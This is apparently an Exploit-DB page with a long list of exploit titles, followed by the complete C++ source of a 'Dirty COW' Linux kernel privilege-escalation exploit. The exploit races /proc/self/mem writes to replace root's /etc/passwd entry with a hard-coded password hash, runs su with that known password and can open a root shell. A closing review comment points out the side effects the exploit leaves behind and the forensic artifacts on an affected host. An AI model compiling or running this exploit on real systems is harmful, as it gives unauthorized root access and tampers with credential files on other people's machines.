
7 new exploits Xitami Web Server 5.0a0 - Denial of Service Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd) WinPower 4.9.0.4 - Privilege Escalation Internet PhotoShow (page) - Remote File Inclusion Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion EQdkp 1.3.0 - (dbal.php) Remote File Inclusion EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion MercuryBoard 1.1.4 - (User-Agent) SQL Injection MercuryBoard 1.1.4 - 'User-Agent' SQL Injection EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup Web Slider 0.6 - (path) Remote File Inclusion Web Slider 0.6 - 'path' Parameter Remote File Inclusion Zomplog 3.8 - (mp3playlist.php speler) SQL Injection Zomplog 3.8 - 'mp3playlist.php' SQL Injection EQdkp 1.3.2 - (listmembers.php rank) SQL Injection EQdkp 1.3.2 - 'listmembers.php' SQL Injection CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection ActiveKB KnowledgeBase 2.x - 'catId' SQL 
Injection ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection Zomplog 3.8.1 - upload_files.php Arbitrary File Upload Zomplog 3.8.1 - Arbitrary File Upload CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection Mega File Hosting Script 1.2 - (fid) SQL Injection Mega File Hosting Script 1.2 - 'fid' Parameter SQL Injection CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload AJ HYIP ACME - 'topic_detail.php id' SQL Injection EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC) e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection AJ HYIP ACME - 'topic_detail.php' SQL Injection EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC) e107 Plugin BLOG Engine 2.2 - 'rid' Parameter Blind SQL Injection CaLogic Calendars 1.2.2 - (langsel) SQL Injection CaLogic Calendars 1.2.2 - 'langsel' Parameter SQL Injection EMO Realty Manager - 'news.php ida' SQL Injection The Real Estate Script - 'dpage.php docID' SQL Injection Linkspile - 'link.php cat_id' SQL Injection Freelance Auction Script 1.0 - (browseproject.php) SQL Injection EMO Realty Manager - 'ida' Parameter SQL Injection The Real Estate Script - 'docID' Parameter SQL Injection Linkspile - 'cat_id' Parameter SQL Injection Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting Kostenloses Linkmanagementscript - Remote File Inclusion newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities 68 Classifieds 4.0 - (category.php cat) SQL Injection newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection 68 Classifieds 4.0 - 'category.php' SQL Injection StanWeb.CMS - (default.asp id) SQL 
Injection StanWeb.CMS - SQL Injection Archangel Weblog 0.90.02 - (post_id) SQL Injection Archangel Weblog 0.90.02 - 'post_id' Parameter SQL Injection WR-Meeting 1.0 - (msnum) Local File Disclosure WR-Meeting 1.0 - 'msnum' Parameter Local File Disclosure FicHive 1.0 - (category) Blind SQL Injection Smeego 1.0 - (Cookie lang) Local File Inclusion FicHive 1.0 - 'category' Parameter Blind SQL Injection Smeego 1.0 - 'Cookie lang' Local File Inclusion TAGWORX.CMS - Multiple SQL Injections TAGWORX.CMS 3.00.02 - Multiple SQL Injections lulieblog 1.2 - Multiple Vulnerabilities AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add Admin easycms 0.4.2 - Multiple Vulnerabilities Lulieblog 1.2 - Multiple Vulnerabilities AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin Easycms 0.4.2 - Multiple Vulnerabilities AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection EntertainmentScript - 'play.php id' SQL Injection EntertainmentScript 1.4.0 - 'play.php' SQL Injection ecms 0.4.2 - (SQL Injection / Security Bypass) Multiple Vulnerabilities Mantis Bug Tracker 1.1.1 - (Code Execution / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities ComicShout 2.5 - (index.php comic_id) SQL Injection eCMS 0.4.2 - SQL Injection / Security Bypass Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery ComicShout 2.5 - 'comic_id' Parameter SQL Injection PHP Jokesite 2.0 - 'cat_id' SQL Injection Netious CMS 0.4 - (index.php pageid) SQL Injection PHP Jokesite 2.0 - 'cat_id' Parameter SQL Injection Netious CMS 0.4 - 'pageid' Parameter SQL Injection 6rbScript - 'news.php newsid' SQL Injection webl?sninger 4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities 6rbScript - 'news.php' SQL Injection Weblosninger 4 - Cross-Site Scripting / SQL Injection e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / 
Cross-Site Scripting / dt) Multiple Vulnerabilities e107 Plugin BLOG Engine 2.2 - 'uid' Parameter Blind SQL Injection Quate CMS 0.3.4 - Multiple Vulnerabilities RoomPHPlanning 1.5 - (idresa) SQL Injection PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion RoomPHPlanning 1.5 - 'idresa' Parameter SQL Injection PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion CMS MAXSITE 1.10 - (category) SQL Injection CMS MAXSITE 1.10 - 'category' Parameter SQL Injection CKGold Shopping Cart 2.5 - (category_id) SQL Injection CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection ComicShout 2.8 - (news.php news_id) SQL Injection ComicShout 2.8 - 'news_id' Parameter SQL Injection AJ HYIP ACME - 'news.php id' SQL Injection AJ HYIP ACME - 'news.php' SQL Injection Quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection AJ HYIP ACME - 'comment.php artid' SQL Injection AJ HYIP ACME - 'readarticle.php artid' SQL Injection AJ HYIP ACME - 'comment.php' SQL Injection AJ HYIP ACME - 'readarticle.php' SQL Injection 6rbScript 3.3 - 'singerid' SQL Injection 6rbScript 3.3 - 'singerid' Parameter SQL Injection 6rbScript 3.3 - (section.php name) Local File Inclusion 6rbScript 3.3 - 'section.php' Local File Inclusion RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit RoomPHPlanning 1.6 - 'userform.php' Create Admin User Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection ActiveKB KnowledgeBase - 'loadpanel.php Panel' Local File Inclusion ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion Quate CMS 0.3.5 - (Remote File Inclusioni 
/ Local File Inclusion) Multiple Vulnerabilities Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery YABSoft Advanced Image Hosting Script - SQL Injection Advanced Image Hosting Script - SQL Injection MercuryBoard 1.1 - index.php SQL Injection MercuryBoard 1.1 - 'index.php' SQL Injection CMS Made Simple 0.10 - Lang.php Remote File Inclusion CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion Zomplog 3.3/3.4 - detail.php HTML Injection Zomplog 3.3/3.4 - 'detail.php' HTML Injection CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting CMS Made Simple 1.0.2 - 'SearchInput' Parameter Cross-Site Scripting EQDKP 1.3.1 - Show Variable Cross-Site Scripting EQdkp 1.3.1 - Cross-Site Scripting CMS Made Simple 105 - Stylesheet.php SQL Injection CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection Internet PhotoShow - 'login_admin' Parameter Unauthorized Access 68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'login.php' Cross-Site Scripting 68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'category.php' Cross-Site Scripting 68 Classifieds 4.1 - searchresults.php page Parameter Cross-Site Scripting 68 Classifieds 4.1 - toplistings.php page Parameter Cross-Site Scripting 68 Classifieds 4.1 - viewlisting.php view Parameter Cross-Site Scripting 68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting 68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting 68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting 68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting CMS Made Simple Download 
Manager 1.4.1 Module - Arbitrary File Upload CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities Zomplog 3.9 - 'message' Parameter Cross-Site Scripting YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion Joomla! Component Catalog 1.0.7 - SQL Injection Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection Xfinity Gateway - Cross-Site Request Forgery
261 lines
No EOL
10 KiB
C++
Executable file
// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
|
|
// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
|
|
//
|
|
// -----------------------------------------------------------------
|
|
// Copyright (C) 2016 Gabriele Bonacini
|
|
//
|
|
// This program is free software; you can redistribute it and/or modify
|
|
// it under the terms of the GNU General Public License as published by
|
|
// the Free Software Foundation; either version 3 of the License, or
|
|
// (at your option) any later version.
|
|
// This program is distributed in the hope that it will be useful,
|
|
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
// GNU General Public License for more details.
|
|
// You should have received a copy of the GNU General Public License
|
|
// along with this program; if not, write to the Free Software Foundation,
|
|
// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
|
// -----------------------------------------------------------------
|
|
|
|
#include <iostream>
|
|
#include <fstream>
|
|
#include <string>
|
|
#include <thread>
|
|
#include <sys/mman.h>
|
|
#include <fcntl.h>
|
|
#include <unistd.h>
|
|
#include <sys/types.h>
|
|
#include <pwd.h>
|
|
#include <pty.h>
|
|
#include <string.h>
|
|
#include <termios.h>
|
|
#include <sys/wait.h>
|
|
#include <signal.h>
|
|
|
|
#define BUFFSIZE 1024
|
|
#define PWDFILE "/etc/passwd"
|
|
#define BAKFILE "./.ssh_bak"
|
|
#define TMPBAKFILE "/tmp/.ssh_bak"
|
|
#define PSM "/proc/self/mem"
|
|
#define ROOTID "root:"
|
|
#define SSHDID "sshd:"
|
|
#define MAXITER 300
|
|
#define DEFPWD "$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/"
|
|
#define TXTPWD "dirtyCowFun\n"
|
|
#define DISABLEWB "echo 0 > /proc/sys/vm/dirty_writeback_centisecs\n"
|
|
#define EXITCMD "exit\n"
|
|
#define CPCMD "cp "
|
|
#define RMCMD "rm "
|
|
|
|
using namespace std;
|
|
|
|
class Dcow{
|
|
private:
|
|
bool run, rawMode, opShell, restPwd;
|
|
void *map;
|
|
int fd, iter, master, wstat;
|
|
string buffer, etcPwd, etcPwdBak,
|
|
root, user, pwd, sshd;
|
|
thread *writerThr, *madviseThr, *checkerThr;
|
|
ifstream *extPwd;
|
|
ofstream *extPwdBak;
|
|
struct passwd *userId;
|
|
pid_t child;
|
|
char buffv[BUFFSIZE];
|
|
fd_set rfds;
|
|
struct termios termOld, termNew;
|
|
ssize_t ign;
|
|
|
|
void exitOnError(string msg);
|
|
public:
|
|
Dcow(bool opSh, bool rstPwd);
|
|
~Dcow(void);
|
|
int expl(void);
|
|
};
|
|
|
|
Dcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),
|
|
iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),
|
|
madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr),
|
|
child(0){
|
|
userId = getpwuid(getuid());
|
|
user.append(userId->pw_name).append(":");
|
|
extPwd = new ifstream(PWDFILE);
|
|
while (getline(*extPwd, buffer)){
|
|
buffer.append("\n");
|
|
etcPwdBak.append(buffer);
|
|
if(buffer.find(root) == 0){
|
|
etcPwd.insert(0, root).insert(root.size(), pwd);
|
|
etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(),
|
|
buffer.begin() + buffer.find(":", root.size()), buffer.end());
|
|
}else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){
|
|
etcPwd.insert(0, buffer);
|
|
}else{
|
|
etcPwd.append(buffer);
|
|
}
|
|
}
|
|
extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);
|
|
extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());
|
|
extPwdBak->close();
|
|
fd = open(PWDFILE,O_RDONLY);
|
|
map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);
|
|
}
|
|
|
|
Dcow::~Dcow(void){
|
|
extPwd->close();
|
|
close(fd);
|
|
delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;
|
|
if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);
|
|
if(child != 0) wait(&wstat);
|
|
}
|
|
|
|
void Dcow::exitOnError(string msg){
|
|
cerr << msg << endl;
|
|
// if(child != 0) kill(child, SIGKILL);
|
|
throw new exception();
|
|
}
|
|
|
|
int Dcow::expl(void){
|
|
madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });
|
|
writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR);
|
|
while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET);
|
|
ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }
|
|
});
|
|
checkerThr = new thread([&](){ while(iter <= MAXITER){
|
|
extPwd->clear(); extPwd->seekg(0, ios::beg);
|
|
buffer.assign(istreambuf_iterator<char>(*extPwd),
|
|
istreambuf_iterator<char>());
|
|
if(buffer.find(pwd) != string::npos &&
|
|
buffer.size() >= etcPwdBak.size()){
|
|
run = false; break;
|
|
}
|
|
iter ++; usleep(300000);
|
|
}
|
|
run = false;
|
|
});
|
|
|
|
cerr << "Running ..." << endl;
|
|
madviseThr->join();
|
|
writerThr->join();
|
|
checkerThr->join();
|
|
|
|
if(iter <= MAXITER){
|
|
child = forkpty(&master, nullptr, nullptr, nullptr);
|
|
|
|
if(child == -1) exitOnError("Error forking pty.");
|
|
|
|
if(child == 0){
|
|
execlp("su", "su", "-", nullptr);
|
|
exitOnError("Error on exec.");
|
|
}
|
|
|
|
if(opShell) cerr << "Password overridden to: " << TXTPWD << endl;
|
|
memset(buffv, 0, BUFFSIZE);
|
|
ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);
|
|
if(bytes_read <= 0) exitOnError("Error reading su prompt.");
|
|
cerr << "Received su prompt (" << buffv << ")" << endl;
|
|
|
|
if(write(master, TXTPWD, strlen(TXTPWD)) <= 0)
|
|
exitOnError("Error writing pwd on tty.");
|
|
|
|
if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0)
|
|
exitOnError("Error writing cmd on tty.");
|
|
|
|
if(!opShell){
|
|
if(write(master, EXITCMD, strlen(EXITCMD)) <= 0)
|
|
exitOnError("Error writing exit cmd on tty.");
|
|
}else{
|
|
if(restPwd){
|
|
string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(" ").append(PWDFILE).append("\n");
|
|
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
|
|
exitOnError("Error writing restore cmd on tty.");
|
|
restoreCmd = string(RMCMD).append(TMPBAKFILE).append("\n");
|
|
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
|
|
exitOnError("Error writing restore cmd (rm) on tty.");
|
|
}
|
|
|
|
if(tcgetattr(STDIN_FILENO, &termOld) == -1 )
|
|
exitOnError("Error getting terminal attributes.");
|
|
|
|
termNew = termOld;
|
|
termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));
|
|
|
|
if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)
|
|
exitOnError("Error setting terminal in non-canonical mode.");
|
|
rawMode = true;
|
|
|
|
while(true){
|
|
FD_ZERO(&rfds);
|
|
FD_SET(master, &rfds);
|
|
FD_SET(STDIN_FILENO, &rfds);
|
|
|
|
if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )
|
|
exitOnError("Error on select tty.");
|
|
|
|
if(FD_ISSET(master, &rfds)) {
|
|
memset(buffv, 0, BUFFSIZE);
|
|
bytes_read = read(master, buffv, BUFFSIZE - 1);
|
|
if(bytes_read <= 0) break;
|
|
if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)
|
|
exitOnError("Error writing on stdout.");
|
|
}
|
|
|
|
if(FD_ISSET(STDIN_FILENO, &rfds)) {
|
|
memset(buffv, 0, BUFFSIZE);
|
|
bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);
|
|
if(bytes_read <= 0) exitOnError("Error reading from stdin.");
|
|
if(write(master, buffv, bytes_read) != bytes_read) break;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
return [](int ret, bool shell){
|
|
string msg = shell ? "Exit.\n" : string("Root password is: ") + TXTPWD + "Enjoy! :-)\n";
|
|
if(ret <= MAXITER){cerr << msg; return 0;}
|
|
else{cerr << "Exploit failed.\n"; return 1;}
|
|
}(iter, opShell);
|
|
}
|
|
|
|
void printInfo(char* cmd){
|
|
cerr << cmd << " [-s] [-n] | [-h]\n" << endl;
|
|
cerr << " -s open directly a shell, if the exploit is successful;" << endl;
|
|
cerr << " -n combined with -s, doesn't restore the passwd file." << endl;
|
|
cerr << " -h print this synopsis;" << endl;
|
|
cerr << "\n If no param is specified, the program modifies the passwd file and exits." << endl;
|
|
cerr << " A copy of the passwd file will be create in the current directory as .ssh_bak" << endl;
|
|
cerr << " (unprivileged user), if no parameter or -n is specified.\n" << endl;
|
|
exit(1);
|
|
}
|
|
|
|
int main(int argc, char** argv){
|
|
const char flags[] = "shn";
|
|
int c;
|
|
bool opShell = false,
|
|
restPwd = true;
|
|
|
|
opterr = 0;
|
|
while ((c = getopt(argc, argv, flags)) != -1){
|
|
switch (c){
|
|
case 's':
|
|
opShell = true;
|
|
break;
|
|
case 'n':
|
|
restPwd = false;
|
|
break;
|
|
case 'h':
|
|
printInfo(argv[0]);
|
|
break;
|
|
default:
|
|
cerr << "Invalid parameter." << endl << endl;
|
|
printInfo(argv[0]);
|
|
}
|
|
}
|
|
|
|
if(!restPwd && !opShell){
|
|
cerr << "Invalid parameter: -n requires -s" << endl << endl;
|
|
printInfo(argv[0]);
|
|
}
|
|
|
|
Dcow dcow(opShell, restPwd);
|
|
return dcow.expl();
|
|
} |
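Review bot: The usage text in `printInfo` does not match what the code leaves on the host. With no flags `restPwd` stays true, so the constructor writes the passwd copy to `/tmp/.ssh_bak` (TMPBAKFILE) rather than to `./.ssh_bak` as the help says, and the restore commands are only sent inside the `opShell` / `restPwd` branch of `expl()`. A no-flag run therefore ends with the root entry of /etc/passwd still carrying the hard-coded DEFPWD hash, the backup still in /tmp, and `dirty_writeback_centisecs` at 0, none of which is undone anywhere in the file. I would correct the help line and add a header comment such as `// Side effects: root entry in /etc/passwd replaced; backup in /tmp/.ssh_bak (./.ssh_bak with -n); dirty_writeback_centisecs left at 0`. Those leftovers are also the artifacts a responder would check for on a host where this binary was run.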